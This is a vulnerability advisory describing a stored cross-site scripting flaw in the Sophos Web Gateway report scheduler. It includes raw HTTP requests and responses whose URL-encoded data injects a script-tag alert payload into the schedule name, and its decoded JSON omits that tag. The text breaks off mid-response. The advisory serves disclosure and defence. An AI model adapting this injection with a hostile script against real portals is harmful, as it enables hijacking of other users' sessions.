KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability Advisory ID: KL-001-2018-001 Publication Date: 2018.01.26 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: Web Gateway Affected Version: 4.4.1 Platform: Embedded Linux CWE Classification: CWE-79: Improper Neutralization of Input During Web Page Generation, CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page Impact: Arbitrary Code Execution Attack vector: HTTP 2. Vulnerability Description The report scheduler menu within the management portal contains a persistent cross site scripting vulnerability. This vulnerability can be used to target other users of the same portal. 3. Technical Description A valid session is required to create the report with the persistent cross site scripting payload attached. An example attack payload has been included below. This payload is designed to trigger an alert box with the number one being displayed. POST /index.php?c=report_scheduler HTTP/1.1 Host: 1.3.3.7 Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 1190 DNT: 1 Connection: close action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d HTTP/1.1 200 OK Date: Sat, 29 Jul 2017 16:05:25 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41 {"status":0,"statusMsg":"Settings saved"} The URL-encoded input being passed in input parameter can be decoded to a array containing a single JSON buffer. [{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", "sb_detailed_policy_count": "1", "sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": "7", "sb_weekly_day": "Monday", "txt_schedule_name": "test", "cb_activate_schedule": "yes", "recipients": "test@test.asdasd", "schedule_id": "dGVzdA==", "owner": "admin"}] Within the JSON buffer is a key called txt_schedule_name. The value for this key is the name of the scheduled report. This value is included in the report schedule list. "txt_schedule_name": "test" The HTML tags are then stored. When the report schedule is viewed, the resulting JSON is sent as content-type text/html instead of application/json, causing the browser to execute any unescaped javascript it contains. The output is HTML-encoded with the exception of the txt_schedule_name: value which is not sanitized, and the payload triggers. POST /index.php?c=report_scheduler HTTP/1.1 Host: 1.3.3.7 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 81 DNT: 1 Connection: close action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c11955632068abddd HTTP/1.1 200 OK Date: Sat, 29 Jul 2017 16:06:38 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1365 {"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a16896568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_count":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","sb_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test